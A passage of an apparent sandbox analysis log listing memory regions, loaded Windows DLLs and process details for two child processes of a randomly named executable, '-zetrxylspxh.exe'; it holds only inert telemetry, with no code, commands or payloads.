0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6397 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6398 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6399 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6400 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6401 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6517 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6518 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6519 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6520 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6521 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6538 start_va = 0x4e0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6539 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6540 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6811 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6812 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6813 start_va = 0x4e0000 end_va = 0x59dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6814 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 6815 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6816 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6817 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6818 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6819 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6820 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6821 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6822 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6823 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6824 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7230 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7231 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7232 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7233 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7234 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7235 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7236 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7237 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7238 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7239 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7240 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7241 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7560 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7689 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7690 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 7706 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 232 os_tid = 0x340 Thread: id = 252 os_tid = 0x84 Process: id = "70" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x11fc0000" os_pid = "0xe64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6408 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6409 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6410 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6411 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6412 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6413 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6414 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6415 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6416 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6417 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6418 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6419 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6420 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6421 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6422 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6423 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6562 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6563 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6564 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6565 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6582 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6583 start_va = 0x440000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6584 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6585 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6586 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6587 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6889 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6906 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6907 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6908 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 6909 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 6910 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6911 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6912 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6913 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6914 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6931 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6932 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6933 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6934 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6935 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7345 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7346 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7347 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7348 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7349 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7350 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7351 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7352 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7353 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7354 start_va = 0x440000 end_va = 0x469fff monitored = 0 entry_point = 0x445680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7355 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7356 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 7357 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 233 os_tid = 0x638 Thread: id = 257 os_tid = 0x10ac Process: id = "71" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb9c5000" os_pid = "0xe6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6429 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6430 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6431 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6432 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6433 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6434 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6435 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6436 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6437 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6438 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6439 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6440 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6441 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6442 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6443 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6444 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6624 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6625 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6626 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6627 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6628 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6645 start_va = 0x4e0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6646 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6647 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6648 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6649 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6650 start_va = 0x650000 end_va = 0x70dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7013 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7014 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7015 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = 